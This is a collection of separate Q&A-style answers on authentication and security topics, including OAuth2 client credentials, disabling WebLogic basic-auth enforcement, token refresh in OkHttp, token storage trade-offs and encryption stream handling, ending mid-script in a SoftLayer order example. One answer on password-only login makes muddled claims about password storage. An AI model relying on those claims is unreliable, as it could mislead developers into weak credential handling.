As you can see in the DbContextService code, we replace the values inside {} to build a different connection string for each company. In this case I've added the database names to the drop-down list, but in real development please avoid this: for security reasons it's better not to expose the real names of your databases and other configuration. You can keep a mapping table on the controller's side to resolve the selected database from the company code. One improvement to this solution would be to serialize the login model as JSON into the session instead of storing each value separately. Please let me know if this answer is useful. PS: Let me know in the comments if you want the full code uploaded to OneDrive.
Disclaimer: I've never used Keycloak, but the tag wiki says it's compliant with OAuth2, so I'll trust that information.

At a really high-level view, you seem to have two requirements:

authenticate actions triggered by an end user while they're using your system.
authenticate actions triggered by your system at an unknown time, where there is no requirement for an end user to be online.

You already met the first one by relying on a token-based authentication system, and I would do exactly the same for the second point; the only difference would be that the tokens would be issued to your system using the OAuth2 client credentials grant, instead of the other grants, which are targeted at scenarios where there is an end user. (source: Client Credentials Grant)

In your case, Keycloak would play the role of Auth0, and your client applications are microservices, which can maintain client secrets used to authenticate themselves with the authorization server and obtain access tokens.

One thing to keep in mind is that if your system relies on the sub claim for much more than authentication and authorization, then you may need to make some adjustments. For example, I've seen systems where performing action A required knowing that it was targeted at users X and Y, but the payload for the action only received user Y and assumed user X was the currently authenticated principal. This works fine when everything is synchronous, but merely switching the payload to specify both users would mean that the action could be done asynchronously by a system-authenticated principal.
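The client credentials exchange itself is just a form-encoded POST to the token endpoint. A sketch (in Python for illustration; the realm name, client id, and secret are placeholder values, and the form fields are the standard ones from the OAuth2 spec, RFC 6749 §4.4):

```python
# Build the request body a microservice would POST to Keycloak's token
# endpoint to obtain an access token via the client credentials grant.
import urllib.parse

# Hypothetical Keycloak realm token endpoint.
token_endpoint = "https://keycloak.example.com/auth/realms/myrealm/protocol/openid-connect/token"

form = {
    "grant_type": "client_credentials",
    "client_id": "billing-service",  # hypothetical microservice client
    "client_secret": "s3cr3t",       # secret held by the microservice
}
body = urllib.parse.urlencode(form)

# An HTTP client would POST `body` to `token_endpoint` with
# Content-Type: application/x-www-form-urlencoded and read the
# access_token field from the JSON response.
print(body)
```

No end user is involved at any point, which is exactly what the asynchronous, system-triggered actions need.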
Where does it take effect? The enforce-valid-basic-auth-credentials flag affects the entire domain, so it will work for both of your projects. The enforce-valid-basic-auth-credentials flag is true by default, and WebLogic Server authentication is performed. If authentication fails, the request is rejected. WebLogic Server must therefore have knowledge of the user and password. You may want to change the default behavior if you rely on an alternate authentication mechanism. For example, you might use a backend web service to authenticate the client, so WebLogic Server does not need to know about the user. With the default authentication enforcement enabled, the web service can do its own authentication, but only if WebLogic Server authentication first succeeds. If you explicitly set the enforce-valid-basic-auth-credentials flag to false, WebLogic Server does not perform authentication for HTTP BASIC authentication client requests for which access control was not enabled for the target resource. Resource Link: Understanding BASIC Authentication with Unsecured Resources WebLogic bypass basic authentication What does Oracle say about enforce-valid-basic-auth-credentials? Oracle WebLogic Server authentication is enabled by default. However, this configuration prevents Oracle WebLogic Server from using application-managed authentication. You must disable Oracle WebLogic Server authentication by setting the enforce-valid-basic-auth-credentials parameter to false. Procedure To disable Oracle WebLogic Server authentication: In a text editor, open the config.xml file for the domain where you deployed IBM CMIS for Content Manager OnDemand. The config.xml file is in the Oracle/Middleware/user_projects/domains/domain_name/config directory. Locate the <security-configuration> element. Add the following argument to the end of the element:

<enforce-valid-basic-auth-credentials>false</enforce-valid-basic-auth-credentials>

Start or restart all of the servers in the domain.
Resource Link: Disabling Oracle WebLogic Server authentication for IBM CMIS for Content Manager OnDemand UPDATE#1: Why is it set to false? It controls whether or not the system should allow requests with invalid Basic Authentication credentials to access unsecured resources. (Interface=weblogic.management.configuration.SecurityConfigurationMBean, Attribute=getEnforceValidBasicAuthCredentials) Actually, you need to do 2 things here; sometimes editing config.xml alone is not enough. You also need to set the flag via WLST:

connect('weblogicUser','weblogicPassword','t3://localhost:7001')
edit()
startEdit()
cd('SecurityConfiguration/Your_Domain')
set('EnforceValidBasicAuthCredentials','false')
save()
activate()

N.B.: Do not forget to substitute your WebLogic user, password, WebLogic URL and your domain in the 'cd' command. If you do these things successfully, the change will take effect in your configuration file. Resolution: After restarting the server, if you look in the config.xml file, you will see that another tag has been added. The config.xml file now looks like this:

.........
<enforce-valid-basic-auth-credentials>false</enforce-valid-basic-auth-credentials>
<use-kss-for-demo>true</use-kss-for-demo>
</security-configuration>
............

The use-kss-for-demo tag may depend on your WebLogic configuration, so it is strongly suggested by Val Bonn to use the WLST way to update this flag. Resource Link: https://stackoverflow.com/a/39619242/2293534 UPDATE#2: So, you want to know what the impact is? By default WebLogic Server looks at the Authentication header, and even if your code and app are set to allow anonymous access, if there's any HTTP Authentication header, WebLogic fails to handle the request and throws up a browser login dialog: The Publisher web service by default uses authentication headers, so the Publisher authentication headers get sent to your portlet code.
Fortunately, the fix for this is pretty straightforward and documented: set enforce-valid-basic-auth-credentials to false. Resource Link: http://blog.integryst.com/webcenter-interaction/2010/03/24/setting-config-xml-for-weblogic-in-oracles-jdeveloper/
Authenticating with an OAuth flow within an Office web add-in is a known issue. A better explanation of the problem can be found here. Due to the popularity of clickjacking on the internet, it is common to prevent login pages from being displayed inside frames. The X-FRAME-Options meta tag in HTML makes it easy for providers to implement this safeguard on a widespread or domain/origin-specific basis. Pages that are not "frameable" will not load consistently in an Office add-in. Therefore you need to rely on a popup mechanism: in short, the authentication flow is carried out in a popup to avoid iframing problems. The link above is a little bit outdated because it states that popups are a necessary evil. Microsoft, aware of this problem, recently proposed the Dialog API to overcome it. Let us get back to our adal.js problem. I believe that you should stop using adal.js because it was not meant to be used in an add-in web context. Even though it implements a popup technique, it does not use the Dialog API when available. You should try to take advantage of this Dialog API when available, otherwise you will hit many problems (deactivated popups, security zones, etc.). Your best option is to implement your own flow mechanism or use Office-js-helpers as explained in this response.
The client identifier and your domain (which I'm assuming refers to the assigned Auth0 domain, similar to [account].auth0.com) are both considered information that does not need to be kept secret. The domain represents the entity handling the authentication; it's the equivalent of accounts.google.com for your application. The client identifier is defined within the OAuth 2.0 specification, which clearly indicates that it is not confidential information: The client identifier is not a secret; it is exposed to the resource owner and MUST NOT be used alone for client authentication. In browser-based or other applications where the actual code is located in a client environment, it's unavoidable to have information stored there for authentication purposes. You just need to be sure that the information stored is okay to be disclosed, as it is with the two examples you gave. On the other hand, these types of applications cannot securely use a client secret as defined by OAuth 2.0 because, like you said, anyone could see it by inspecting the code.
I had the same problem and I managed to solve it using a ReentrantLock. (Note: the original snippet used fields that were never declared; I've added the constructor and fields so the class matches the test below.)

import java.io.IOException;
import java.net.HttpURLConnection;
import java.util.concurrent.locks.Lock;
import java.util.concurrent.locks.ReentrantLock;

import okhttp3.Interceptor;
import okhttp3.Request;
import okhttp3.Response;
import timber.log.Timber;

public class RefreshTokenInterceptor implements Interceptor {

    private final AuthenticationService authenticationService;
    private final RefreshTokenStorage refreshTokenStorage;
    private final Lock lock = new ReentrantLock();

    public RefreshTokenInterceptor(AuthenticationService authenticationService,
                                   RefreshTokenStorage refreshTokenStorage) {
        this.authenticationService = authenticationService;
        this.refreshTokenStorage = refreshTokenStorage;
    }

    @Override
    public Response intercept(Interceptor.Chain chain) throws IOException {
        Request request = chain.request();
        Response response = chain.proceed(request);
        if (response.code() == HttpURLConnection.HTTP_UNAUTHORIZED) {
            // first thread will acquire the lock and start the token refresh
            if (lock.tryLock()) {
                Timber.i("refresh token thread holds the lock");
                try {
                    // this sync call will refresh the token and save it for
                    // later use (e.g. sharedPreferences)
                    authenticationService.refreshTokenSync();
                    Request newRequest = recreateRequestWithNewAccessToken(chain);
                    return chain.proceed(newRequest);
                } catch (ServiceException exception) {
                    // depending on what you need to do you can logout the user at this
                    // point or throw an exception and handle it in your onFailure callback
                    return response;
                } finally {
                    Timber.i("refresh token finished. release lock");
                    lock.unlock();
                }
            } else {
                Timber.i("wait for token to be refreshed");
                // this will block the thread until the thread that is refreshing
                // the token calls the .unlock() method
                lock.lock();
                lock.unlock();
                Timber.i("token refreshed. retry request");
                Request newRequest = recreateRequestWithNewAccessToken(chain);
                return chain.proceed(newRequest);
            }
        } else {
            return response;
        }
    }

    private Request recreateRequestWithNewAccessToken(Interceptor.Chain chain) {
        String freshAccessToken = refreshTokenStorage.getAccessToken();
        Timber.d("[freshAccessToken] %s", freshAccessToken);
        return chain.request().newBuilder()
                .header("access_token", freshAccessToken)
                .build();
    }
}

The main advantage of this solution is that you can write a unit test using Mockito and test it. You will have to enable the Mockito incubating feature for mocking final classes (the Response from OkHttp). Read more about it here. The test looks something like this:

@RunWith(MockitoJUnitRunner.class)
public class RefreshTokenInterceptorTest {

    private static final String FRESH_ACCESS_TOKEN = "fresh_access_token";

    @Mock
    AuthenticationService authenticationService;
    @Mock
    RefreshTokenStorage refreshTokenStorage;
    @Mock
    Interceptor.Chain chain;

    @BeforeClass
    public static void setup() {
        Timber.plant(new Timber.DebugTree() {
            @Override
            protected void log(int priority, String tag, String message, Throwable t) {
                System.out.println(Thread.currentThread() + " " + message);
            }
        });
    }

    @Test
    public void refreshTokenInterceptor_works_as_expected() throws IOException, InterruptedException {
        Response unauthorizedResponse = createUnauthorizedResponse();
        when(chain.proceed((Request) any())).thenReturn(unauthorizedResponse);
        when(authenticationService.refreshTokenSync()).thenAnswer(new Answer<Boolean>() {
            @Override
            public Boolean answer(InvocationOnMock invocation) throws Throwable {
                // refresh token takes some time
                Thread.sleep(10);
                return true;
            }
        });
        when(refreshTokenStorage.getAccessToken()).thenReturn(FRESH_ACCESS_TOKEN);
        Request fakeRequest = createFakeRequest();
        when(chain.request()).thenReturn(fakeRequest);
        final Interceptor interceptor = new RefreshTokenInterceptor(authenticationService, refreshTokenStorage);

        Timber.d("5 requests try to refresh token at the same time");
        final CountDownLatch countDownLatch5 = new CountDownLatch(5);
        for (int i = 0; i < 5; i++) {
            new Thread(new Runnable() {
                @Override
                public void run() {
                    try {
                        interceptor.intercept(chain);
                        countDownLatch5.countDown();
                    } catch (IOException e) {
                        throw new RuntimeException(e);
                    }
                }
            }).start();
        }
        countDownLatch5.await();
        verify(authenticationService, times(1)).refreshTokenSync();

        Timber.d("next time another 3 threads try to refresh the token at the same time");
        final CountDownLatch countDownLatch3 = new CountDownLatch(3);
        for (int i = 0; i < 3; i++) {
            new Thread(new Runnable() {
                @Override
                public void run() {
                    try {
                        interceptor.intercept(chain);
                        countDownLatch3.countDown();
                    } catch (IOException e) {
                        throw new RuntimeException(e);
                    }
                }
            }).start();
        }
        countDownLatch3.await();
        verify(authenticationService, times(2)).refreshTokenSync();

        Timber.d("1 thread tries to refresh the token");
        interceptor.intercept(chain);
        verify(authenticationService, times(3)).refreshTokenSync();
    }

    private Response createUnauthorizedResponse() throws IOException {
        Response response = mock(Response.class);
        when(response.code()).thenReturn(401);
        return response;
    }

    private Request createFakeRequest() {
        Request request = mock(Request.class);
        Request.Builder fakeBuilder = createFakeBuilder();
        when(request.newBuilder()).thenReturn(fakeBuilder);
        return request;
    }

    private Request.Builder createFakeBuilder() {
        Request.Builder mockBuilder = mock(Request.Builder.class);
        when(mockBuilder.header("access_token", FRESH_ACCESS_TOKEN)).thenReturn(mockBuilder);
        return mockBuilder;
    }
}
This will work, however you have to write a couple of lines of code in your authentication logic in order to achieve what you're looking for. First of all, you have to distinguish between Roles and Groups in Azure AD (B2C). A user Role is very specific and only valid within Azure AD (B2C) itself: the Role defines what permissions a user has inside Azure AD. A Group (or Security Group) defines user group membership, which can be exposed to external applications. The external applications can model Role-based access control on top of Security Groups. Yes, I know it may sound a bit confusing, but that's what it is. So, your first step is to model your Groups in Azure AD B2C: you have to create the groups and manually assign users to them. You can do that in the Azure Portal (https://portal.azure.com/). Then, back in your application, you will have to code a bit and ask the Azure AD B2C Graph API for the user's memberships once the user is successfully authenticated. You can use this sample to get inspired on how to get a user's group memberships. It is best to execute this code in one of the OpenID notifications (i.e. SecurityTokenValidated) and add the user's roles to the ClaimsPrincipal. Once you change the ClaimsPrincipal to carry the Azure AD Security Groups as "Role Claim" values, you will be able to use the Authorize attribute with its Roles feature. This is really 5-6 lines of code. Finally, you can give your vote to the feature request here in order to get a group membership claim without having to query the Graph API for it.
If the same key and initialization vector are used for encoding and decoding, this issue does not come from data decoding but from data encoding. After you have called the Write method on a CryptoStream object, you must ALWAYS call the FlushFinalBlock method before the Close method. The MSDN documentation on the CryptoStream.FlushFinalBlock method says: "Calling the Close method will call FlushFinalBlock ..." https://msdn.microsoft.com/en-US/library/system.security.cryptography.cryptostream.flushfinalblock(v=vs.110).aspx This is wrong. Calling the Close method just closes the CryptoStream and the output Stream. If you do not call FlushFinalBlock before Close after writing data to be encrypted, then when decrypting the data, a call to the Read or CopyTo method on your CryptoStream object will raise a CryptographicException (message: "Padding is invalid and cannot be removed"). This is probably true for all encryption algorithms derived from SymmetricAlgorithm (Aes, DES, RC2, Rijndael, TripleDES), although I only verified it for AesManaged with a MemoryStream as the output Stream. So, if you receive this CryptographicException on decryption, read your output Stream's Length property value after you have written your data to be encrypted, then call FlushFinalBlock and read the value again. If it has changed, you know that calling FlushFinalBlock is NOT optional. And you do not need to perform any padding programmatically, or choose another Padding property value; padding is the FlushFinalBlock method's job. Additional remark for Kevin: Yes, CryptoStream calls FlushFinalBlock before calling Close, but it is too late: when the CryptoStream Close method is called, the output stream is also closed. If your output stream is a MemoryStream, you cannot read its data after it is closed, so you need to call FlushFinalBlock on your CryptoStream before using the encrypted data written to the MemoryStream. If your output stream is a FileStream, things are worse because writing is buffered.
The consequence is that the last written bytes may not be written to the file if you close the output stream before calling Flush on the FileStream. So before calling Close on the CryptoStream, you first need to call FlushFinalBlock on your CryptoStream, then call Flush on your FileStream.
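The "Padding is invalid" message itself comes from block-cipher padding removal. As a language-agnostic illustration (a Python sketch of PKCS#7 padding, not the .NET implementation), here is why losing the final block, which is what happens when FlushFinalBlock is skipped, makes unpadding fail:

```python
BLOCK = 16  # AES block size in bytes

def pkcs7_pad(data):
    """Append 1..BLOCK bytes, each equal to the pad length."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    """Strip padding; raise if the trailing bytes are not a valid pad."""
    if not data or len(data) % BLOCK:
        raise ValueError("Padding is invalid and cannot be removed.")
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("Padding is invalid and cannot be removed.")
    return data[:-n]

# Dropping the final block (the one FlushFinalBlock would have written) leaves
# trailing bytes that no longer form a valid pad, so unpadding must fail.
```

The decryptor has no way to repair this: the information needed to remove the padding lived in the block that was never flushed.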
Not answered in 7 months! Oh well, for posterity... Inquiry and Paging - Link Layer Connection (Is there anyone out there? Hello!) Inquiry and Paging are procedures and states of the Bluetooth Link Controller during the connection process. The standard progression of states towards a connection is as follows: One device performs the Inquiry procedure, a request message for devices within 10 metres to respond, if they are in range. This device is the Master. Devices that are discoverable will respond with an Inquiry Response. Example: If you turn on Bluetooth on your phone, it often states it is discoverable and then lists a number of devices around you. The Master device will then initiate a connection by paging a specific Slave device. If the Slave device is amenable, it will respond with a Page Response. Example: On your phone, you select the Bluetooth headphones to connect with. At that point lots of cool stuff happens so that the radios can match frequency-hopping patterns and the timing of radio packets. When it's over, and successful, you have a Link Layer connection. Typically, there are two types of connection: Asynchronous Connection-Less (ACL) - packet data Synchronous Connection-Oriented (SCO) - audio (or video) data, real-time. Pairing (security and remembering past lovers) Bluetooth doesn't need any security to do Service Discovery (the next stage), but all Bluetooth services need security, so pairing is nearly always done BEFORE Service Discovery, BUT it doesn't have to be. At the lowest level of pairing security, it 'just works'. Your phone says it's connected and that's it. The link is encrypted, but did you really connect to your headphones, or your sister's down the hall? Once connected and encrypted like this, the phone may ask you if you want to stay paired with the headphones. If you select 'yes' or tick the box, your phone will remember the encryption and security keys for your headphones (as will your headphones for your phone).
The next time they connect, they will recognise each other and just connect and encrypt the link without having to go through pairing again. Now, if you're connecting your phone to your car over Bluetooth, you probably want better security. There are various options, but typically it goes like this: when it comes to pairing, your car system will display something like 'Pairing code 4753495' and your phone will display something similar, like 'Verify pairing code 4753495 - Yes/No'. If they match, then you have a really secure connection and you absolutely know that your phone is paired with your car and not your sister's rubbish Toyota out on the drive. Bluetooth these days is really secure; the latest specs support US Secret Service levels of encryption, and for that reason some Bluetooth firmware and devices have strict export restrictions. Older, legacy devices will still use 4-digit PIN codes and are less secure. Service Discovery (What can you do?) The Master will ask the Slave to tell it a little about itself, and the Slave tells the Master all the cool things it can do. The Master will reciprocate too. With our headphones and mobile phone example, once you press on the headphones in the list of devices, it will connect and pair, and you will get a pop-up saying it supports things like 'Phone Media' (Hands-Free / Headset Profiles) and 'Music Media' (Advanced Audio Distribution Profile, Audio/Video Remote Control Profile, and some protocols under that). Your car, in addition to Phone and Music Media, can probably do things like browse your phone's contacts or even display text messages. Profile/Service Connection (Finally) After all that, you're set up. Typically a profile/service-level connection doesn't happen until you try to use it, e.g. play music or make/receive a phone call, but the Link Layer connection is there underneath. So, you can start playing music on your phone and the sweet beats will magically come out of your headphones or car stereo...
Until your sister calls.
The @CreatedDate won't work by itself if you just put @EntityListeners(AuditingEntityListener.class) on your entities. In order for it to work, you have to do a little more configuration. Let's say that in your DB the audited field is of String type, and you want to return the user that is currently logged in as its value; then do this:

public class CustomAuditorAware implements AuditorAware<String> {

    @Override
    public String getCurrentAuditor() {
        String loggedName = SecurityContextHolder.getContext().getAuthentication().getName();
        return loggedName;
    }
}

You can put any functionality there that fits your needs, but you certainly must have a bean that references a class implementing AuditorAware. The second, and equally important, part is to create a bean that returns that class, in a configuration class annotated with @EnableJpaAuditing, like this:

@Configuration
@EnableJpaAuditing
public class AuditorConfig {

    @Bean
    public CustomAuditorAware auditorProvider() {
        return new CustomAuditorAware();
    }
}

If your poison is XML configuration, then do this:

<bean id="customAuditorAware" class="org.moshe.arad.general.CustomAuditorAware" />
<jpa:auditing auditor-aware-ref="customAuditorAware"/>
Yes, and this is very annoying. It is due to the registration call. Not only that: onAuthStateChanged is going to be called many times in many different states, with no direct way of knowing which state it is. The documentation says: onAuthStateChanged(FirebaseAuth auth) This method gets invoked in the UI thread on changes in the authentication state: Right after the listener has been registered When a user is signed in When the current user is signed out When the current user changes When there is a change in the current user's token Here are some tips to discover the current state: Registration call: skip the first call with a flag. User signed in: user from parameter is != null. User signed out: user from parameter is == null. Current user changed: user from parameter is != null and last user id is != user id from parameter. User token refreshed: user from parameter is != null and last user id is == user id from parameter. This listener is a mess and very bug-prone. The Firebase team should look into it.
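The tips above amount to a small decision table. Here is a language-agnostic sketch of that logic (shown in Python for brevity; the class and state names are my own, not part of the Firebase API):

```python
class AuthStateClassifier:
    """Classify onAuthStateChanged-style callbacks using a first-call flag
    and the previously seen user id (hypothetical helper, not Firebase API)."""

    def __init__(self):
        self.first_call = True
        self.last_uid = None

    def classify(self, user_uid):
        """user_uid is None when no user is signed in."""
        if self.first_call:
            # registration call: always fires once, right after registering
            self.first_call = False
            state = "listener_registered"
        elif user_uid is None:
            state = "signed_out"
        elif self.last_uid is None:
            state = "signed_in"
        elif user_uid != self.last_uid:
            state = "user_changed"
        else:
            state = "token_refreshed"
        self.last_uid = user_uid
        return state
```

The same flag-plus-last-uid bookkeeping can be kept in a Java listener field to tell the five documented callback reasons apart.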
Choosing the storage is more about trade-offs than trying to find a definitive best choice. Let's go through a few options: Option 1 - Web Storage (localStorage or sessionStorage) Pros The browser will not automatically include anything from Web Storage in HTTP requests, making it not vulnerable to CSRF Can only be accessed by Javascript running in the exact same domain that created the data Allows you to use the most semantically correct approach to pass token authentication credentials in HTTP (the Authorization header with a Bearer scheme) It's very easy to cherry-pick the requests that should contain authentication Cons Cannot be accessed by Javascript running in a sub-domain of the one that created the data (a value written by example.com cannot be read by sub.example.com) ⚠️ Is vulnerable to XSS In order to perform authenticated requests you can only use browser/library APIs that allow you to customize the request (pass the token in the Authorization header) Usage You leverage the browser localStorage or sessionStorage API to store and then retrieve the token when performing requests.
localStorage.setItem('token', 'asY-x34SfYPk'); // write
console.log(localStorage.getItem('token')); // read

Option 2 - HTTP-only cookie Pros It's not vulnerable to XSS The browser automatically includes the token in any request that meets the cookie specification (domain, path and lifetime) The cookie can be created at a top-level domain and used in requests performed by sub-domains Cons ⚠️ It's vulnerable to CSRF You need to be aware of, and always consider, the possible usage of the cookies in sub-domains Cherry-picking the requests that should include the cookie is doable but messier You may (still) hit some issues with small differences in how browsers deal with cookies ⚠️ If you're not careful you may implement a CSRF mitigation strategy that is vulnerable to XSS The server side needs to validate a cookie for authentication instead of the more appropriate Authorization header Usage You don't need to do anything client-side, as the browser will automatically take care of things for you. Option 3 - Javascript-accessible cookie ignored by the server side Pros It's not vulnerable to CSRF (because it's ignored by the server) The cookie can be created at a top-level domain and used in requests performed by sub-domains Allows you to use the most semantically correct approach to pass token authentication credentials in HTTP (the Authorization header with a Bearer scheme) It's somewhat easy to cherry-pick the requests that should contain authentication Cons ⚠️ It's vulnerable to XSS If you're not careful with the path where you set the cookie, then the cookie is included automatically by the browser in requests, which adds unnecessary overhead In order to perform authenticated requests you can only use browser/library APIs that allow you to customize the request (pass the token in the Authorization header) Usage You leverage the browser document.cookie API to store and then retrieve the token when performing requests.
This API is not as fine-grained as Web Storage (you get all the cookies at once), so you need extra work to parse out the information you need.

document.cookie = "token=asY-x34SfYPk"; // write
console.log(document.cookie); // read

Additional Notes This may seem a weird option, but it does have the nice benefit that you can have storage available to a top-level domain and all sub-domains, which is something Web Storage won't give you. However, it's more complex to implement. Conclusion - Final Notes My recommendation for most common scenarios would be to go with Option 1, mostly because: If you create a Web application you need to deal with XSS; always, independently of where you store your tokens If you don't use cookie-based authentication, CSRF should not even pop up on your radar, so it's one less thing to worry about Also note that the cookie-based options are quite different from each other: in Option 3 cookies are used purely as a storage mechanism, so it's almost as if they were an implementation detail of the client side. However, Option 2 means a more traditional way of dealing with authentication; for a further read on this cookies vs tokens thing you may find this article interesting: Cookies vs Tokens: The Definitive Guide. Finally, none of the options mention it, but use of HTTPS is mandatory of course, which means cookies should be created appropriately to take that into consideration.
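The cookie-parsing work mentioned above is the same in any language; here is a minimal sketch of it (shown with Python's http.cookies module for illustration; in the browser you would split the document.cookie string in JavaScript instead):

```python
from http.cookies import SimpleCookie

def read_cookie(cookie_string, name):
    """Parse a 'name=value; name2=value2' cookie string and extract one value."""
    jar = SimpleCookie()
    jar.load(cookie_string)       # parses every cookie in the string
    morsel = jar.get(name)        # pick out just the one we care about
    return morsel.value if morsel is not None else None
```

For example, read_cookie("token=asY-x34SfYPk; theme=dark", "token") returns the token value, while asking for a name that is not present yields None.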
The best practice for authentication is to require a minimum of 2 things you need to remember when you want to log in. When a server shows you a login challenge with a username and password, a possible hacker needs to figure out two strings of data, but when you only use a password you make it very easy to break into an application. You can also use token-based authentication; just ask your boss what he prefers. A user can create his own token via his phone or another device where he is already logged in, so you log in once to create a token for logging in on an intranet / website. When you want to use only a password, be sure you can check it against the database. Note that hashing algorithms can't be reversed, so you can't "un"-hash a stored password; instead you hash the supplied password and compare the result with the stored hash. When you use token-based authentication, you can create an application where the user logs in. Every x minutes (something like 5 or 10) the token expires and he needs to create another one. Every time he creates another code, you add it to the database and relate it to a user / user account. When you only use a password for authentication, a user can be hacked very easily because that is the only thing a hacker needs to know, and with some bad luck two users can use the same password. Also, with this solution you almost can't avoid plain-text passwords or an insecure reversible password encryption to check whether the password is correct and related to the user. But to answer your question: Yes, it is possible. No, it isn't safe. No, it isn't best practice.
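As an illustration of the expiring-token idea above, here is a minimal Python sketch; the helper names and the HMAC scheme are my own assumptions for illustration, not a production-ready design:

```python
import hashlib
import hmac
import time

SECRET = b"server-side-secret"   # assumption: kept on the server only
TOKEN_TTL = 10 * 60              # tokens expire after 10 minutes

def create_token(user_id, now=None):
    """Issue a token bound to a user id and an expiry timestamp."""
    now = time.time() if now is None else now
    expires = int(now + TOKEN_TTL)
    payload = "%s:%d" % (user_id, expires)
    sig = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return "%s:%s" % (payload, sig)

def verify_token(token, now=None):
    """Return the user id if the token is valid and unexpired, else None."""
    now = time.time() if now is None else now
    try:
        user_id, expires, sig = token.rsplit(":", 2)
    except ValueError:
        return None
    payload = "%s:%s" % (user_id, expires)
    expected = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None  # tampered or forged token
    if now > int(expires):
        return None  # expired: the user must create a new one
    return user_id
```

Because each token carries its own expiry and signature, the server can reject stale or forged tokens without storing plain-text secrets for comparison.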
OpenSSL gives you two forms of security: authentication through a third party guarantees that you are talking to the server you expect; encryption guarantees that the data you transmit between the two parties (i.e. client and server) can (ideally) not be decrypted and understood. If you can see what your client is sending using packet analysers (e.g. tcpdump or wireshark), then it probably means your client is NOT sending encrypted packets and is NOT using SSL. If you have openssl installed, you can test the server by using the following command while tracking the packets: openssl s_client -connect my.server.com:443 Note that I assume the SSL connection is established on port 443 (https). You can then send data to the server by typing it on the command line, and this should be encrypted. If you are dealing with a web server, then you can type the GET command and it should return the webpage. Of course the received / sent data is shown decrypted in the terminal, but it should be encrypted in the packets observed through wireshark/tcpdump.
Let me elaborate on your question. First of all: you're lucky, there's an (almost) out-of-the-box solution for your problem. For social and normal authentication and registration, including email verification etc., you can rely on django-allauth: https://github.com/pennersr/django-allauth django-rest-auth provides a restful platform built on top of allauth, so that you don't even have to start building your auth REST API from scratch: https://github.com/Tivix/django-rest-auth When it comes to your DB schema, there are a few options. You could go ahead and build your own authentication system, which, in my opinion, is overkill. Rather, I would implement a profile model which has a OneToOne relationship to the User model from django.contrib.auth.models.User, as described in this chapter of the Django docs. Your models (of course in separate apps) would look like this:

from django.contrib.auth.models import User
from django.db import models
# other imports

class UserProfile(models.Model):
    user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='profile')
    books_read = models.IntegerField(default=0)
    books_recommended = models.IntegerField(default=0)

class Book(models.Model):
    title = models.CharField(...)
    author = models.ForeignKey('UserProfile', on_delete=models.CASCADE, related_name='books')

(Note that recent Django versions require the on_delete argument on OneToOneField and ForeignKey.) Another question you will run into is how to update and/or display those nested relations in your serializers. This FAQ article from the django-rest-auth docs and this chapter of the official django-rest-framework docs will get you jumpstarted. Best, D
I have little Unity experience (other than researching others' questions on this subject) but for the most part I believe you are correct. TinCan.NET should work with Unity based on what others have said, and it provides everything you need to communicate with the LRS (so there is no need to do your own POST, etc.; instead look at the RemoteLRS class methods). In general I would avoid querying the LRS directly for analytics reporting; instead consider it a long-lived data store that should be used to populate a reporting tool. Having said that, you can certainly see the data in an LRS. You can access a free LRS at https://cloud.scorm.com (from Rustici Software, maintainers of TinCan.NET) by signing up for an account. Note you may run into a common issue with SSL certificate validation and will want to have a look at Mono https webrequest fails with "The authentication or decryption has failed" if you do. I can't speak to the standalone, mobile, web player question, though I'd expect anything supporting .NET to work.
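For context on what actually travels to the LRS, an xAPI (Tin Can) statement is just a small JSON document with an actor, a verb and an object. A sketch of the general shape (the activity id and names below are made-up examples, and I show it in Python for brevity rather than C#):

```python
import json

# Rough shape of an xAPI statement, the kind of payload RemoteLRS sends.
statement = {
    "actor": {"mbox": "mailto:learner@example.com", "name": "Learner"},
    "verb": {
        "id": "http://adlnet.gov/expapi/verbs/completed",
        "display": {"en-US": "completed"},
    },
    "object": {
        "id": "http://example.com/activities/unity-level-1",  # made-up activity id
        "definition": {"name": {"en-US": "Unity Level 1"}},
    },
}

encoded = json.dumps(statement)  # what goes over the wire as the request body
```

Seeing the raw shape makes it easier to sanity-check what your Unity build is sending when you inspect the LRS.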
If I have this right, then there's a pretty simple solution to your problem. The user is authenticated in the MVC app, which means any calls to the MVC controllers and action methods are protected and have been successfully authenticated against. Within your MVC app, you are making requests to your Web API. The Web API needs to protect its resources somehow from incoming requests, and considering that only your MVC app should be responsible for making these requests, you should implement a client-secret OAuth flow within your Web API. Think of it as registering your MVC app as a consumer of your Web API. Each call from your MVC app to the Web API supplies its client id and secret, which your Web API verifies before serving up its resources. From your Web API's point of view it doesn't care who the user is; it only cares about the applications that are trying to access its resources. If an application cannot provide a secret, it doesn't get access. EDIT: In a scenario where your Web API is not public-facing and requires only authenticated access to its resources, your client browser should not be talking directly to the API. You could use token-based authentication, where once authenticated by a token endpoint the client browser passes a bearer token in the header of each request made to your API. However, that would mean passing an access token to the browser, and I don't think that's great for security. That is why I would recommend that the client browser only ever makes calls to the MVC app, as it lives on a server where its calls can't be manipulated and any access token can't be intercepted.
To order a virtual guest with MongoDB it’s necessary to use the price id of this item. The best way to verify/place an order with the available price items for any product is to review the following method:

http://sldn.softlayer.com/reference/services/SoftLayer_Product_Package/getItemPrices

The following script can be used to order a Virtual Guest with MongoDB Community Edition:

"""
Order Virtual Guest with MongoDB Community Edition.

Important manual pages:
https://sldn.softlayer.com/reference/services/SoftLayer_Virtual_Guest
http://sldn.softlayer.com/reference/services/SoftLayer_Product_Order/placeOrder
http://sldn.softlayer.com/reference/services/SoftLayer_Product_Order/verifyOrder

License: http://sldn.softlayer.com/article/License
Author: SoftLayer Technologies, Inc. <[email protected]>
"""
import SoftLayer
from pprint import pprint as pp

USERNAME = 'set me'
API_KEY = 'set me'

client = SoftLayer.Client(username=USERNAME, api_key=API_KEY)

order = {
    'complexType': 'SoftLayer_Container_Product_Order_Virtual_Guest',
    'quantity': 1,
    'virtualGuests': [
        {'hostname': 'test-template', 'domain': 'example.com'}
    ],
    'location': 168642,  # San Jose 1
    'packageId': 46,     # CCI Package
    'prices': [
        {'id': 1640},   # 1 x 2.0 GHz Core
        {'id': 1644},   # 1 GB RAM
        {'id': 905},    # Reboot / Remote Console
        {'id': 272},    # 10 Mbps Public & Private Networks
        {'id': 50231},  # 1000 GB Bandwidth
        {'id': 21},     # 1 IP Address
        {'id': 2202},   # 25 GB (SAN)
